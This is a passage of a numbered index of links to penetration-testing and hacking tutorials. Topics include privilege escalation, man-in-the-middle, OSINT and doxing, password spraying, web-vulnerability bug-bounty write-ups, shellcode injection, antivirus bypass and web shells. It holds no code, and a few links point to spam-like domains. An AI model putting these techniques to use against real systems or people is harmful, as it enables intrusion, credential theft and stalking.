Walkthrough:\n\n\n\nhttps://medium.com/egghunter/toppo-1-vulnhub-walkthrough-c5f05358cf7d\n\n\n\n\n-1676-Privilege Escalation resources:\n\n\n\nhttps://forum.hackthebox.eu/discussion/1243/privilege-escalation-resources\n\n\n\n\n-1678-OSCP Notes – Privilege Escalation (Linux):\n\n\n\nhttps://securism.wordpress.com/oscp-notes-privilege-escalation-linux/\n\n\n\n\n-1679-Udev Exploit Allows Local Privilege Escalation :\n\n\n\nwww.madirish.net/370\n\n\n\n\n-1680-Understanding Linux Privilege Escalation and Defending Against It:\n\n\n\n\nhttps://linux-audit.com/understanding-linux-privilege-escalation-and-defending-againt-it\n\n\n\n\n-1681-Windows Privilege Escalation Using PowerShell:\n\n\n\nhttps://hacknpentest.com/windows-privilege-escalation-using-powershell/\n\n\n\n-1682-Privilege Escalation | Azeria Labs:\n\n\n\n\nhttps://azeria-labs.com/privilege-escalation/\n\n\n\n\n-1683-Abusing SUDO (Linux Privilege Escalation):\n\n\n\nhttps://touhidshaikh.com/blog/?p=790\n\n\n\n-1684-Privilege Escalation - Linux:\n\n\n\nhttps://mysecurityjournal.blogspot.com/p/privilege-escalation-linux.html\n\n\n\n\n\n-1685-0day Linux Escalation Privilege Exploit Collection :\n\n\n\nhttps://blog.spentera.id/0day-linux-escalation-privilege-exploit-collection/\n\n\n\n\n-1686-Linux for Pentester: cp Privilege Escalation :\n\n\n\n\nhttps://hackin.co/articles/linux-for-pentester-cp-privilege-escalation.html\n\n\n\n\n-1687-Practical Privilege Escalation Using Meterpreter:\n\n\n\nhttps://ethicalhackingblog.com/practical-privilege-escalation-using-meterpreter/\n\n\n\n-1688-dirty_sock: Linux Privilege Escalation (via snapd):\n\n\n\nhttps://www.redpacketsecurity.com/dirty_sock-linux-privilege-escalation-via-snapd/\n\n\n\n\n-1689-Linux privilege escalation:\n\n\n\nhttps://jok3rsecurity.com/linux-privilege-escalation/\n\n\n\n\n-1690-The Complete Meterpreter Guide | Privilege Escalation & Clearing Tracks:\n\n\n\n\nhttps://hsploit.com/the-complete-meterpreter-guide-privilege-escalation-clearing-tracks/\n\n\n\n\n-1691-How to prepare for PWK/OSCP, a noob-friendly guide:\n\n\n\n\nhttps://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob\n\n\n\n\n-1692-Basic Linux privilege escalation by kernel exploits:\n\n\n\nhttps://greysec.net/showthread.php?tid=1355\n\n\n\n\n-1693-Linux mount without root :\n\n\n\nepaymentamerica.com/tozkwje/xlvkawj2.php?trjsef=linux-mount-without-root\n\n\n\n\n-1694-Linux Privilege Escalation Oscp:\n\n\n\n\nwww.condadorealty.com/2h442/linux-privilege-escalation-oscp.html\n\n\n\n\n-1695-Privilege Escalation Attack Tutorial:\n\n\n\nhttps://alhilalgroup.info/photography/privilege-escalation-attack-tutorial\n\n\n\n\n-1696-Oscp Bethany Privilege Escalation:\n\n\n\nhttps://ilustrado.com.br/i8v7/7ogf.php?veac=oscp-bethany-privilege-escalation\n\n\n\n\n-1697-Hacking a Website and Gaining Root Access using Dirty COW Exploit:\n\n\n\nhttps://ethicalhackers.club/hacking-website-gaining-root-access-using-dirtycow-exploit/\n\n\n\n\n-1698-Privilege Escalation - Linux · Total OSCP Guide:\n\n\n\nhttps://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html\n\n\n\n\n-1699-Linux advanced privilege escalation:\n\n\n\nhttps://www.slideshare.net/JameelNabbo/linux-advanced-privilege-escalation\n\n\n\n-1700-Local Linux privilege escalation overview:\n\n\n\nhttps://myexperiments.io/linux-privilege-escalation.html\n\n\n\n-1701-Windows Privilege Escalation Scripts & Techniques :\n\n\n\nhttps://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194\n\n\n\n\n-1702-Penetration Testing: Maintaining Access:\n\n\n\nhttps://resources.infosecinstitute.com/penetration-testing-maintaining-access/\n\n\n\n\n-1703-Kali Linux Maintaining Access :\n\n\n\nhttps://www.tutorialspoint.com/kali_linux/kali_linux_maintaining_access.htm\n\n\n\n-1704-Best Open Source Tools for Maintaining Access & Tunneling:\n\n\n\nhttps://n0where.net/maintaining-access\n\n\n\n-1705-Maintaining Access Part 1: Introduction and Metasploit Example:\n\n\n\nhttps://www.hackingloops.com/maintaining-access-metasploit/\n\n\n\n-1706-Maintaining Access - Ethical hacking and penetration testing:\n\n\n\nhttps://miloserdov.org/?cat=143\n\n\n\n-1707-Maintaining Access with Web Backdoors [Weevely]:\n\n\n\n\nhttps://www.yeahhub.com/maintaining-access-web-backdoors-weevely/\n\n\n\n\n\n-1708-Best Open Source MITM Tools: Sniffing & Spoofing:\n\n\n\nhttps://n0where.net/mitm-tools\n\n\n\n-1709-Cain and Abel - Man in the Middle (MITM) Attack Tool Explained:\n\n\n\nhttps://cybersguards.com/cain-and-abel-man-in-the-middle-mitm-attack-tool-explained/\n\n\n\n\n-1710-Man In The Middle Attack (MITM):\n\n\n\n\nhttps://medium.com/@nancyjohn.../man-in-the-middle-attack-mitm-114b53b2d987\n\n\n\n\n-1711-Real-World Man-in-the-Middle (MITM) Attack :\n\n\n\nhttps://ieeexplore.ieee.org/document/8500082\n\n\n\n-1712-The Ultimate Guide to Man in the Middle Attacks :\n\n\n\n\nhttps://doubleoctopus.com/blog/the-ultimate-guide-to-man-in-the-middle-mitm-attacks-and-how-to-prevent-them/\n\n\n\n\n\n-1713-How to Conduct ARP Spoofing for MITM Attacks:\n\n\n\nhttps://tutorialedge.net/security/arp-spoofing-for-mitm-attack-tutorial/\n\n\n\n-1714-How To Do A Man-in-the-Middle Attack Using ARP Spoofing & Poisoning:\n\n\n\nhttps://medium.com/secjuice/man-in-the-middle-attack-using-arp-spoofing-fa13af4f4633\n\n\n\n-1715-Ettercap and middle-attacks tutorial :\n\n\n\n\nhttps://pentestmag.com/ettercap-tutorial-for-windows/\n\n\n\n-1716-How To Setup A Man In The Middle Attack Using ARP Poisoning:\n\n\n\nhttps://online-it.nu/how-to-setup-a-man-in-the-middle-attack-using-arp-poisoning/\n\n\n\n-1717-Intro to Wireshark and Man in the Middle Attacks:\n\n\n\n\nhttps://www.commonlounge.com/discussion/2627e25558924f3fbb6e03f8f912a12d\n\n\n\n-1718-MiTM Attack with Ettercap:\n\n\n\nhttps://www.hackers-arise.com/single-post/2017/08/28/MiTM-Attack-with-Ettercap\n\n\n\n-1719-Man in the Middle Attack with Websploit Framework:\n\n\n\nhttps://www.yeahhub.com/man-middle-attack-websploit-framework/\n\n\n\n\n-1720-SSH MitM Downgrade :\n\n\n\nhttps://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade\n\n\n\n-1721-How to use Netcat for Listening, Banner Grabbing and Transferring Files:\n\n\n\nhttps://www.yeahhub.com/use-netcat-listening-banner-grabbing-transferring-files/\n\n\n\n\n-1722-Powershell port scanner and banner grabber:\n\n\n\nhttps://www.linkedin.com/pulse/powershell-port-scanner-banner-grabber-jeremy-martin/\n\n\n\n-1723-What is banner grabbing attack:\n\n\n\nhttps://rxkjftu.ga/sport/what-is-banner-grabbing-attack.php\n\n\n\n\n-1724-Network penetration testing:\n\n\n\nhttps://guif.re/networkpentest\n\n\n\n-1725-NMAP Cheatsheet:\n\n\n\nhttps://redteamtutorials.com/2018/10/14/nmap-cheatsheet/\n\n\n\n-1726-How To Scan a Network With Nmap:\n\n\n\nhttps://online-it.nu/how-to-scan-a-network-with-nmap/\n\n\n\n\n-1727-Hacking Metasploitable : Scanning and Banner grabbing:\n\n\n\nhttps://hackercool.com/2015/11/hacking-metasploitable-scanning-banner-grabbing/\n\n\n\n-1728-Penetration Testing of an FTP Server:\n\n\n\nhttps://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b\n\n\n\n\n-1729-Nmap Usage & Cheet-Sheet:\n\n\n\nhttps://aerroweb.wordpress.com/2018/03/14/namp-cheat-sheet/\n\n\n\n\n-1730-Discovering SSH Host Keys with NMAP:\n\n\n\nhttps://mwhubbard.blogspot.com/2015/03/discovering-ssh-host-keys-with-nmap.html\n\n\n\n\n-1731-Banner Grabbing using Nmap & NetCat - Detailed Explanation:\n\n\n\nhttps://techincidents.com/banner-grabbing-using-nmap-netcat\n\n\n\n\n-1732-Nmap – (Vulnerability Discovery):\n\n\n\nhttps://crazybulletctfwriteups.wordpress.com/2015/09/5/nmap-vulnerability-discovery/\n\n\n\n\n\n-1733-Penetration Testing on MYSQL (Port 3306):\n\n\n\nhttps://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/\n\n\n\n-1774-Password Spraying - Infosec Resources :\n\n\n\nhttps://resources.infosecinstitute.com/password-spraying/\n\n\n\n-1775-Password Spraying- Common mistakes and how to avoid them:\n\n\n\nhttps://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b\n\n\n\n\n-1776-Password Spraying Tutorial:\n\n\n\nhttps://attack.stealthbits.com/password-spraying-tutorial-defense\n\n\n\n\n-1777-password spraying Archives:\n\n\n\nhttps://www.blackhillsinfosec.com/tag/password-spraying/\n\n\n\n-1778-The 21 Best Email Finding Tools::\n\n\n\nhttps://beamery.com/blog/find-email-addresses\n\n\n\n\n-1779-OSINT Primer: People (Part 2):\n\n\n\nhttps://0xpatrik.com/osint-people/\n\n\n\n\n-1780-Discovering Hidden Email Gateways with OSINT Techniques:\n\n\n\nhttps://blog.ironbastion.com.au/discovering-hidden-email-servers-with-osint-part-2/\n\n\n\n\n-1781-Top 20 Data Reconnaissance and Intel Gathering Tools :\n\n\n\nhttps://securitytrails.com/blog/top-20-intel-tools\n\n\n\n\n-1782-101+ OSINT Resources for Investigators [2019]:\n\n\n\nhttps://i-sight.com/resources/101-osint-resources-for-investigators/\n\n\n\n-1783-Digging Through Someones Past Using OSINT:\n\n\n\nhttps://nullsweep.com/digging-through-someones-past-using-osint/\n\n\n\n\n-1784-Gathering Open Source Intelligence:\n\n\n\nhttps://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05\n\n\n\n-1785-How to Locate the Person Behind an Email Address:\n\n\n\nhttps://www.sourcecon.com/how-to-locate-the-person-behind-an-email-address/\n\n\n\n\n-1786-Find hacked email addresses and check breach mails:\n\n\n\nhttps://www.securitynewspaper.com/2019/01/16/find-hacked-email-addresses/\n\n\n\n\n-1787-A Pentester's Guide - Part 3 (OSINT, Breach Dumps, & Password :\n\n\n\nhttps://delta.navisec.io/osint-for-pentesters-part-3-password-spraying-methodology/\n\n\n\n\n-1788-Top 10 OSINT Tools/Sources for Security Folks:\n\n\n\nwww.snoopysecurity.github.io/osint/2018/08/02/10_OSINT_for_security_folks.html\n\n\n\n\n-1789-Top 5 Open Source OSINT Tools for a Penetration Tester:\n\n\n\nhttps://www.breachlock.com/top-5-open-source-osint-tools/\n\n\n\n\n-1790-Open Source Intelligence tools for social media: my own list:\n\n\n\nhttps://www.andreafortuna.org/2017/03/20/open-source-intelligence-tools-for-social-media-my-own-list/\n\n\n\n\n-1791-Red Teaming: I can see you! Insights from an InfoSec expert :\n\n\n\n\nhttps://www.perspectiverisk.com/i-can-see-you-osint/\n\n\n\n\n-1792-OSINT Playbook for Recruiters:\n\n\n\nhttps://amazinghiring.com/osint-playbook/\n\n\n\n\n-1793- Links for Doxing, Personal OSInt, Profiling, Footprinting, Cyberstalking:\n\n\n\n\nhttps://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking\n\n\n\n-1794-Open Source Intelligence Gathering 201 (Covering 12 additional techniques):\n\n\n\nhttps://blog.appsecco.com/open-source-intelligence-gathering-201-covering-12-additional-techniques-b76417b5a544?gi=2afe435c630a\n\n\n\n\n-1795-Online Investigative Tools for Social Media Discovery and Locating People:\n\n\n\nhttps://4thetruth.info/colorado-private-investigator-online-detective-social-media-and-online-people-search-online-search-tools.html\n\n\n\n\n-1796-Expanding Skype Forensics with OSINT: Email Accounts:\n\n\n\n\nhttp://www.automatingosint.com/blog/2016/05/expanding-skype-forensics-with-osint-email-accounts/\n\n\n\n\n-1798-2019 OSINT Guide:\n\n\n\nhttps://www.randhome.io/blog/2019/01/05/2019-osint-guide/\n\n\n\n-1799-OSINT - Passive Recon and Discovery of Assets:\n\n\nhttps://0x00sec.org/t/osint-passive-recon-and-discovery-of-assets/6715\n\n\n\n-1800-OSINT With Datasploit:\n\n\n\nhttps://dzone.com/articles/osint-with-datasploit\n\n\n\n\n-1801-Building an OSINT Reconnaissance Tool from Scratch:\n\n\n\nhttps://medium.com/@SundownDEV/phone-number-scanning-osint-recon-tool-6ad8f0cac27b\n\n\n\n\n-1802-Find Identifying Information from a Phone Number Using OSINT Tools:\n\n\n\nhttps://null-byte.wonderhowto.com/how-to/find-identifying-information-from-phone-number-using-osint-tools-0195472/\n\n\n\n-1803-Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step):\n\n\n\nhttps://www.securitynewspaper.com/2019/05/02/find-details-of-any-mobile-number-email-id-ip-address-in-the-world-step-by-step/\n\n\n\n\n-1804-Investigative tools for finding people online and keeping yourself safe:\n\n\n\nhttps://ijnet.org/en/story/investigative-tools-finding-people-online-and-keeping-yourself-safe\n\n\n\n-1805- Full text of \"The Hacker Playbook 2 Practical Guide To Penetration Testing By Peter Kim\":\n\n\n\nhttps://archive.org/stream/TheHackerPlaybook2PracticalGuideToPenetrationTestingByPeterKim/The%20Hacker%20Playbook%202%20-%20Practical%20Guide%20To%20Penetration%20Testing%20By%20Peter%20Kim_djvu.txt\n\n\n\n-1806-The Internet Archive offers over 15,000,000 freely downloadable books and texts. There is also a collection of 550,000 modern eBooks that may be borrowed by anyone with a free archive.org account:\n\n\n\nhttps://archive.org/details/texts?and%5B%5D=hacking&sin=\n\n\n\n-1807-Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!:\n\n\n\nhttps://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326\n\n\n\n-1808-How to Pass OSCP Like Boss:\n\n\n\nhttps://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d\n\n\n\n\n-1809-Deploy a private Burp Collaborator Server in Azure:\n\n\n\n https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70\n \n \n \n \n -1810-Using Shodan Better Way! :):\n \n \n \n https://medium.com/bugbountywriteup/using-shodan-better-way-b40f330e45f6\n \n \n \n \n-1811-How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty:\n \n \n \n https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-728c5242a115 \n \n \n \n \n -1812-How we got LFI in apache Drill (Recon like a boss)::\n \n \n \n \n \n https://medium.com/bugbountywriteup/how-we-got-lfi-in-apache-drill-recon-like-a-boss-6f739a79d87d\n \n \n \n \n-1813-Chaining Self XSS with UI Redressing is Leading to Session Hijacking:\n \n \n \n \n https://medium.com/bugbountywriteup/chaining-self-xss-with-ui-redressing-is-leading-to-session-hijacking-pwn-users-like-a-boss-efb46249cd14\n \n \n \n \n-1814-Week in OSINT #2019–19:\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-18-1975fb8ea43a4\n\n\n-1814-Week in OSINT #2019–02:\n\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f\n\n\n\n-1815-Week in OSINT #2019–24:\n\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-24-4fcd17ca908f\n\n\n\n\n-1816-Page Admin Disclosure | Facebook Bug Bounty 2019:\n\n\n\n\nhttps://medium.com/bugbountywriteup/page-admin-disclosure-facebook-bug-bounty-2019-ee9920e768eb\n\n\n\n\n\n-1817-XSS in Edmodo within 5 Minute (My First Bug Bounty):\n\n\n\n\nhttps://medium.com/@valakeyur/xss-in-edmodo-within-5-minute-my-first-bug-bounty-889e3da6167d\n\n\n\n\n-1818-Collection Of Bug Bounty Tip-Will Be updated daily:\n\n\n\n\nhttps://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248\n\n\n\n\n\n-1819-A Unique XSS Scenario in SmartSheet || $1000 bounty.:\n\n\n\n\nhttps://medium.com/@rohanchavan/a-unique-xss-scenario-1000-bounty-347f8f92fcc6\n\n\n\n\n-1820-How I found a simple bug in Facebook without any Test:\n\n\n\nhttps://medium.com/bugbountywriteup/how-i-found-a-simple-bug-in-facebook-without-any-test-3bc8cf5e2ca2\n\n\n\n\n-1821-Facebook BugBounty — Disclosing page members:\n\n\n\nhttps://medium.com/@tnirmalz/facebook-bugbounty-disclosing-page-members-1178595cc520\n\n\n\n\n\n-1822-Don’t underestimates the Errors They can provide good $$$ Bounty!:\n\n\n\n\nhttps://medium.com/@noob.assassin/dont-underestimates-the-errors-they-can-provide-good-bounty-d437ecca6596\n\n\n\n-1823-Django and Web Security Headers:\n\n\n\nhttps://medium.com/@ksarthak4ever/django-and-web-security-headers-d72a9e54155e\n\n\n\n\n-1824-Weaponising Staged Cross-Site Scripting (XSS) Payloads:\n\n\n\n\nhttps://medium.com/redteam/weaponising-staged-cross-site-scripting-xss-payloads-7b917f605800\n\n\n\n\n-1825-How I was able to Bypass XSS Protection on HackerOne’s Private Program:\n\n\n\nhttps://medium.com/@vulnerabilitylabs/how-i-was-able-to-bypass-xss-protection-on-hackerones-private-program-8914a31339a9\n\n\n\n\n\n-1826-XSS in Microsoft subdomain:\n\n\n\nhttps://blog.usejournal.com/xss-in-microsoft-subdomain-81c4e46d6631\n\n\n\n\n-1827-How Angular Protects Us From XSS Attacks?:\n\n\n\nhttps://medium.com/hackernoon/how-angular-protects-us-from-xss-attacks-3cb7a7d49d95\n\n\n\n\n\n-1828-[FUN] Bypass XSS Detection WAF:\n\n\n\n\nhttps://medium.com/soulsecteam/fun-bypass-xss-detection-waf-cabd431e030e\n\n\n\n\n\n-1829-Bug Hunting Methodology(Part-2):\n\n\n\n\nhttps://blog.usejournal.com/bug-hunting-methodology-part-2-5579dac06150\n\n\n\n\n\n-1830-Learn Web Application Penetration Testing:\n\n\n\n\nhttps://blog.usejournal.com/web-application-penetration-testing-9fbf7533b361\n\n\n\n\n\n-1831-“Exploiting a Single Parameter”:\n\n\n\nhttps://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523\n\n\n\n-1832-CORS To CSRF Attack:\n\n\n\nhttps://blog.usejournal.com/cors-to-csrf-attack-c33a595d441\n\n\n\n\n-1833-Account Takeover Using CSRF(json-based):\n\n\n\nhttps://medium.com/@shub66452/account-takeover-using-csrf-json-based-a0e6efd1bffc\n\n\n\n-1834-Bypassing Anti-CSRF with Burp Suite Session Handling:\n\n\nhttps://bestestredteam.com/tag/anti-csrf/\n\n\n\n-1835-10 Methods to Bypass Cross Site Request Forgery (CSRF):\n\n\n\nhttps://haiderm.com/10-methods-to-bypass-cross-site-request-forgery-csrf/\n\n\n\n\n\n-1836-Exploiting CSRF on JSON endpoints with Flash and redirects:\n\n\n\n\nhttps://medium.com/p/681d4ad6b31b\n\n\n\n\n-1837-Finding and exploiting Cross-site request forgery (CSRF):\n\n\n\nhttps://securityonline.info/finding-exploiting-cross-site-request-forgery/\n\n\n\n-1838-Hacking Facebook accounts using CSRF in Oculus-Facebook integration:\n\n\n\n\nhttps://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf\n\n\n\n\n-1839-Synchronizer Token Pattern: No more tricks:\n\n\n\nhttps://medium.com/p/d2af836ccf71\n\n\n\n\n-1840-The $12,000 Intersection between Clickjacking, XSS, and Denial of Service:\n\n\n\n\nhttps://medium.com/@imashishmathur/the-12-000-intersection-between-clickjacking-xss-and-denial-of-service-f8cdb3c5e6d1\n\n\n-1841-XML External Entity(XXE):\n\n\nhttps://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b\n\n\n\n-1842-XXE Attacks— Part 1: XML Basics:\n\n\n\nhttps://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26\n\n\n\n-1843-From XXE to RCE with PHP/expect — The Missing Link:\n\n\n\n\n\nhttps://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7\n\n\n\n\n\n-1844-My first XML External Entity (XXE) attack with .gpx file:\n\n\n\n\nhttps://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98\n\n\n\n\n\n\n-1845-Open Redirects & Security Done Right!:\n\n\n\n\nhttps://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496\n\n\n\n\n-1846-XXE on Windows system …then what ??:\n\n\n\n\n\nhttps://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745\n\n\n\n\n\n-1847-Unauthenticated Blind SSRF in Oracle EBS CVE-2018-3167:\n\n\n\n\nhttps://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145\n\n\n\n\n\n\n-1848-SVG XLink SSRF fingerprinting libraries version:\n\n\n\n\nhttps://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c\n\n\n\n\n\n-1849-What is XML Injection Attack:\n\n\n\n\n\nhttps://medium.com/@dahiya.aj12/what-is-xml-injection-attack-279691bd00b6\n\n\n\n\n\n\n\n\n-1850-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1:\n\n\n\n\nhttps://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978\n\n\n\n\n-1851-Penetration Testing Introduction: Scanning & Reconnaissance:\n\n\nhttps://medium.com/cyberdefenders/penetration-testing-introduction-scanning-reconnaissance-f865af0761f\n\n\n\n\n-1852-Beginner’s Guide to recon automation.:\n\n\n\nhttps://medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb\n\n\n\n\n\n-1853-Red Teamer’s Guide to Pulse Secure SSL VPN:\n\n\n\nhttps://medium.com/bugbountywriteup/pulse-secure-ssl-vpn-post-auth-rce-to-ssh-shell-2b497d35c35b\n\n\n\n\n\n-1854-CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection:\n\n\n\nhttps://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787\n\n\n\n\n-1855-How I harvested Facebook credentials via free wifi?:\n\n\n\nhttps://medium.com/bugbountywriteup/how-i-harvested-facebook-credentials-via-free-wifi-5da6bdcae049\n\n\n\n\n-1856-How to hack any Payment Gateway?:\n\n\n\n\nhttps://medium.com/bugbountywriteup/how-to-hack-any-payment-gateway-1ae2f0c6cbe5\n\n\n\n\n-1857-How I hacked into my neighbour’s WiFi and harvested login credentials?:\n\n\n\n\nhttps://medium.com/bugbountywriteup/how-i-hacked-into-my-neighbours-wifi-and-harvested-credentials-487fab106bfc\n\n\n\n\n-1858-What do Netcat, SMTP and self XSS have in common? Stored XSS:\n\n\n\n\nhttps://medium.com/bugbountywriteup/what-do-netcat-smtp-and-self-xss-have-in-common-stored-xss-a05648b72002\n\n\n\n\n\n-1859-1-Click Account Takeover in Virgool.io — a Nice Case Study:\n\n\n\nhttps://medium.com/bugbountywriteup/1-click-account-takeover-in-virgool-io-a-nice-case-study-6bfc3cb98ef2\n\n\n\n\n\n-1860-Digging into Android Applications — Part 1 — Drozer + Burp:\n\n\n\n\nhttps://medium.com/bugbountywriteup/digging-android-applications-part-1-drozer-burp-4fd4730d1cf2\n\n\n\n\n-1861-Linux for Pentester: APT Privilege Escalation:\n\n\n\nhttps://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation\n\n\n\n\n\n-1862-Linux for Pentester : ZIP Privilege Escalation:\n\n\n\nhttps://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation\n\n\n\n\n-1863-Koadic - COM Command & Control Framework:\n\n\n\nhttps://www.hackingarticles.in/koadic-com-command-control-framework\n\n\n\n\n\n-1864-Configure Sqlmap for WEB-GUI in Kali Linux :\n\n\n\n\nhttps://www.hackingarticles.in/configure-sqlmap-for-web-gui-in-kali-linux\n\n\n\n\n\n-1865-Penetration Testing:\n\n\n\nhttps://www.hackingarticles.in/Penetration-Testing\n\n\n-1866-Buffer Overflow Examples, Code execution by shellcode :\n\n\nhttps://0xrick.github.io/binary-exploitation/bof5\n\n\n\n-1867-Dynamic Shellcode Execution:\n\n\n\nhttps://www.countercept.com/blog/dynamic-shellcode-execution\n\n\n\n\n-1868-JSC Exploits:\n\n\n\n\n-https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html\n\n\n\n\n-1869-Injecting Into The Hunt:\n\n\n\n\nhttps://jsecurity101.com/2019/Injecting-Into-The-Hunt\n\n\n\n\n-1870-Bypassing Antivirus with Golang:\n\n\n\nhttps://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher.it\n\n\n\n\n\n-1871-Windows Process Injection: Print Spooler:\n\n\n\nhttps://modexp.wordpress.com/2019/03/07/process-injection-print-spooler\n\n\n\n\n-1872-Inject Shellcode Into Memory Using Unicorn :\n\n\n\nhttps://ethicalhackingguru.com/inject-shellcode-memory-using-unicorn\n\n\n\n\n-1873-Macros and More with SharpShooter v2.0:\n\n\n\nhttps://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0\n\n\n\n\n-1874-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example:\n\n\n\nhttps://www.guru99.com/fuzz-testing\n\n\n\n\n-1875-Introduction to File Format Fuzzing & Exploitation:\n\n\n\nhttps://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3\n\n-1876-Hacking a social media account and safeguarding it:\n\nhttps://medium.com/@ujasdhami79/hacking-a-social-media-account-and-safeguarding-it-e5f69adf62d7\n\n-1877-OTP Bypass on India’s Biggest Video Sharing Site:\n\nhttps://medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89\n\n-1879-Getting Root on macOS via 3rd Party Backup Software:\n\nhttps://medium.com/tenable-techblog/getting-root-on-macos-via-3rd-party-backup-software-b804085f0c9\n\n\n-1880-How to Enumerate MYSQL Database using Metasploit:\n\n\nhttps://ehacking.net/2020/03/how-to-enumerate-mysql-database-using-metasploit-kali-linux-tutorial.html\n\n\n-1881-Exploiting Insecure Firebase Database!\n\n\nhttps://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty\n\n\n-1882-Penetration Testing - Complete Guide:\n\nhttps://softwaretestinghelp.com/penetration-testing-guide\n\n\n-1883-How To Upload A PHP Web Shell On WordPress Site:\n\n\nhttps://1337pwn.com/how-to-upload-php-web-shell-on-wordpress-site\n\n\n-1884-Mimikatz tutorial: How it hacks Windows passwords, credentials:\n\n\nhttps://searchsecurity.techtarget.com/tutorial/Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials\n\n\n\n-1885-Ethical hacking: Lateral movement techniques:\n\n\nhttps://securityboulevard.com/2019/09/ethical-hacking-lateral-movement-techniques\n\n\n-1886-A Pivot Cheatsheet for Pentesters:\n\n\nhttp://nullsweep.com/pivot-cheatsheet-for-pentesters\n\n\n-1887-What to Look for When Reverse Engineering Android Apps:\n\n\nhttp://nowsecure.com/blog/2020/02/26/what-to-look-for-when-reverse-engineering-android-apps\n\n\n\n-1888-Modlishka: Advance Phishing to Bypass 2 Factor Auth:\n\n\nhttp://crackitdown.com/2019/02/modlishka-kali-linux.html\n\n\n-1889-Bettercap Usage Examples (Overview, Custom setup, Caplets ):\n\n\nwww.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets\n\n\n-1890-The Complete Hashcat Tutorial:\n\n\nhttps://ethicalhackingguru.com/the-complete-hashcat-tutorial\n\n\n\n-1891-Wireless Wifi Penetration Testing Hacker Notes:\n\n\nhttps://executeatwill.com/2020/01/05/Wireless-Wifi-Penetration-Testing-Hacker-Notes\n\n\n-1892-#BugBounty writeups:\n\nhttps://pentester.land/list-of-bug-bounty-writeups.html\n\n\n\n-1893-Kerberoasting attack:\n\n\nhttps://en.hackndo.com/kerberoasting\n\n\n-1894-A Pentester's Guide - Part 2 (OSINT - LinkedIn is not just for jobs):\n\n\nhttps://delta.navisec.io/osint-for-pentesters-part-2-linkedin-is-not-just-for-jobs\n\n\n-1895-Radare2 cutter tutorial:\n\nhttp://cousbox.com/axflw/radare2-cutter-tutorial.html\n\n\n-1896-Cracking Password Hashes with Hashcat:\n\n\nhttp://hackingvision.com/2020/03/22/cracking-password-hashes-hashcat\n\n\n\n-1897-From CSRF to RCE and WordPress-site takeover CVE-2020-8417:\n\n\nhttp://blog.wpsec.com/csrf-to-rce-wordpress\n\n\n-1898-Best OSINT Tools:\n\n\nhttp://pcwdld.com/osint-tools-and-software\n\n\n\n-1899-Metasploit Exploitation Tool 2020:\n\n\nhttp://cybervie.com/blog/metasploit-exploitation-tool\n\n\n\n-1900-How to exploit CVE-2020-7961:\n\n\nhttps://synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html\n\n\n\n-1901-PowerShell for Pentesters:\n\n\nhttps://varonis.com/blog/powershell-for-pentesters\n\n\n-1902-Android Pentest Tutorial:\n\n\nhttps://packetstormsecurity.com/files/156432/Android-Pentest-Tutorial-Step-By-Step.html\n\n\n\n-1903-Burp Suite Tutorial:\n\n\nhttps://pentestgeek.com/web-applications/burp-suite-tutorial-1\n\n\n\n-1904-Company Email Enumeration + Breached Email Finder:\n\n\n\nhttps://metalkey.github.io/company-email-enumeration--breached-email-finder.html\n\n\n-1905-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-1906-Active Directory Exploitation Cheat Sheet:\nA cheat sheet that contains common enumeration and attack methods for Windows 